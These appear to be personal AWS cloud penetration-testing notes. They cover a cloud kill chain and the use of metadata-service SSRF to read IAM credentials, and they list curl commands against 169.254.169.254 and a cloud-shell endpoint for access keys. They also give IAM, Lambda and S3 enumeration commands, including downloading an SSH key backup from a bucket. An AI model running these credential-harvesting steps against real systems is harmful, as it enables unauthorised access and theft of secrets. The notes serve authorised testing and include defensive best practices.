Cloud Pentesting

Cloud basics

Cloud kill Chain

Untitled

A kill chain is useful to conceptualize and associate the steps that attackers might take in different phases of their operation. Recon involves enumeration and foot-printing of the cloud infrastructure attack surface, as well as interacting with publicly exposed cloud services. Low hanging fruit such as S3 buckets and Azure/GCP storage buckets might yield cloud and SSH keys, passwords, confidential documents and personally identifiable information (PII). With access to keys or other credentials, we could look to infiltrate the target environment. Initial situational awareness activities will be undertaken, such as identification of other cloud resources and of the permissions and privileges associated with their current user or application.

With a foothold in the cloud infrastructure, we would then look to undertake privilege escalation activities. Privilege escalation within a specific cloud resource or the general cloud environment is useful, as it allows us to undertake additional activities, such as accessing other users’ data and cloud shell files, or capture traffic, and demonstrates the impact of our compromise. Being able to assume the role of a more privileged user also increases the likelihood of us being able to move laterally between cloud resources, accounts (AWS), projects (GCP) resource groups (Azure), or move laterally from an Azure tenant to an on-prem AD domain. In the final stage, we can demonstrate impact by the secure exfiltration of resources (assuming that this has been approved by the client).

AWS Systems Manager (SSM) VS AWS Secrets Manager

SSM allows us to view and control our infrastructure on AWS. SSM parameters allows for securely storing and managing sensitive information and configuration data. We can store data such as passwords, database connection strings, and license codes as parameter values. SSM and AWS Secrets Manager differ in cost and functionality. SSM is more cost-effective with free standard parameters up to 10,000 entries, while Secrets Manager charges for API calls and per secret monthly.

Secrets Manager offers automatic password generation and rotation, which SSM lacks. Secrets Manager is recommended for comprehensive secret management, while SSM is a cost-friendly, basic solution.

Checklist

Computing Enum

The Instance Metadata service is bound to the IP address 169.254.169.254, which is an internal link-local address that is not exposed or routable externally. We can interact with the service locally via a REST API.

This metadata can contain sensitive information such as credentials, if the administrators have attached an IAM role to the EC2 instance. As the metadata is only accessible internally, this may not appear to be particularly interesting from a security perspective. The presence of this metadata, on the other hand, makes Server-Side Request Forgery (SSRF) vulnerabilities in applications that are hosted on compute instances even more serious.

While the methods discussed in this post will work in cases where the legacy version of Instance Metadata Service (IMDSv1) is enabled, they won’t work with the more secure IMDSv2, which requires token authentication. However, IMDSv1 is still enabled by default, which means that this problem is still extremely important.

• Issue the command below to return the EC2 metadata curl 169.254.169.254/latest/meta-data/

• If you reached the meta data visit the route /latest/meta-data/iam/info

  

  Untitled
• /latest/meta-data/iam/security-credentials/{USER}in the example the user is support

  

  Untitled

  The AccessKeyId and SecretAccessKey are used to sign programmatic requests that we make to AWS (like username and pass). We also see a time-limited session token, provided by the AWS Security Token Service (AWS STS), that allows us to authenticate to cloud resources.

• The command aws configure allows us to save these values to an AWS credentials file, located at ~/.aws/credentials

Untitled

• aws configure set aws_session_token "<token_value>" to store session token

• aws sts get-caller-identity like whoami for awscli

• aws iam list-attached-user-policies --user-name {USERNAME} to list the privileges

• Best practices:

  1. Utilize version 2 of the Instance Metadata Service (IMDSv2).

  2. If you need to assign an IAM role to an EC2 instance, ensure that this only has the minimum permissions needed to perform the required tasks (in line with the principle of least privilege).

  3. Be mindful that the presence of instance metadata can make vulnerabilities such as SSRF much more dangerous.

User Enum

• list policies attached to a user aws iam list-user-policies --user-name <USERNAME>

  

  Untitled
• Get the user policy document with details aws iam list-user-policies --user-name <USERNAME>

  

  Untitled
• Retrieving a param with SSM:aws ssm get-parameter --name <PARAM NAME>

• Listing the available Lambda functions aws lambda list-functions --query 'Functions[].[FunctionName, Runtime, LastModified]' --output table

• Invoking the function works aws lambda invoke --function-name crew_administration_data output.txt

• use aws-enumerator aws-enumerator enum -services all

• listing all the policies attatched to a user aws iam list-attached-user-policies --user-name ext-cost-user

• getting a specific ploicy with ARN aws iam get-policy --policy-arn arn:aws:iam::427648302155:policy/ExtPolicyTest

• getting the policy document with its ARN aws iam get-policy --policy-arn arn:aws:iam::427648302155:policy/Policy

• getting the policy document with its ARN and version aws iam get-policy-version --policy-arn arn:aws:iam::427648302155:policy/Policy --version-id v4

  

  Untitled
• listing attached policies aws iam list-attached-user-policies --user-name ext-cost-user aws configure set aws_session_token "<token>"

• Getting the Account ID with Access key aws sts get-access-key-info --access-key-id AKIAWHEOTHRFVXYV44WP

Storage and S3 Enum

• Use dig & dig -x commands on the domain to see DNS info

• Inspect the website source code for any related links for buckets like:

  

  Untitled
• install AWS CLI using sudo pip install awscli --upgrade --user

• check if these buckets are accessible by listing the content aws s3 ls s3://megabank-supportstorage --recursive

• you can search for publicly available buckets here https://buckets.grayhatwarfare.com/

• Perform curl -i https://<yourS3 domain> to see headers of the response and to know what region the bucket in

• search for sensitive info and download files by aws s3 sync s3://megabank-supportstorage/pentest_report/

• Checking the bucket policy aws s3api get-bucket-policy --bucket hl-it-admin

  

  Untitled
• Transferring files frim the S3 to ur PC aws s3 cp s3://hl-it-admin/ssh_keys/ssh_keys_backup.zip .

• Best Practice:

  1. Don’t enable public access for cloud storage if this is not required.

  2. Don’t store confidential information on cloud storage that might be legitimately configured for public access.

  3. Name cloud storage appropriately so that it is obvious what the storage is for.

## asking for aws key and secret key from the cloud shell
-----------------------------------------------------------------------------------
TOKEN=$(curl -X PUT localhost:1338/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 60")
curl localhost:1338/latest/meta-data/container/security-credentials -H "X-aws-ec2-metadata-token: $TOKEN"